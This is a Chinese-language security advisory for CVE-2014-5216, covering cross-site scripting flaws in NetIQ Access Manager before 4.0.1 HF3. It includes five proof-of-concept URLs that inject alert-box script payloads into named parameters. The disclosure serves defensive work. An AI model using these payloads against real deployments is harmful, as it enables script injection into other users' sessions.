NetIQ Access Manager 反射型及持续型跨站脚本漏洞(CVE-2014-5216)
发布日期:2014-12-18
更新日期:2014-12-31
受影响系统:netiq NetIQ Access Manager < 4.0.1 HF3
描述:
CVE(CAN) ID:
CVE-2014-5216
NetIQ Access Manager是简单安全的Web访问解决方案。
NetIQ Access Manager (NAM) 4.0.1 HF3之前版本在实现上存在多个跨站脚本漏洞,远程攻击者利用此漏洞可注入任意Web脚本或HTML。有漏洞的参数包括:nps/servlet/webacc dev.Empty操作的location参数,nidp/jsp/x509err.jsp的error参数,sslvpn/applet_agent.jsp的lang参数,roma/system/cntl的secureLoggingServersA参数。
<*来源:W. Ettlinger
链接:
http://www.securityfocus.com/archive/1/534280
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.Generic
Task&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27
xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%
20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%
29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%2
7xss%27%29%3C/script%3E
建议:
厂商补丁:
netiq
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm浏览次数:2250
严重程度:0(网友投票)
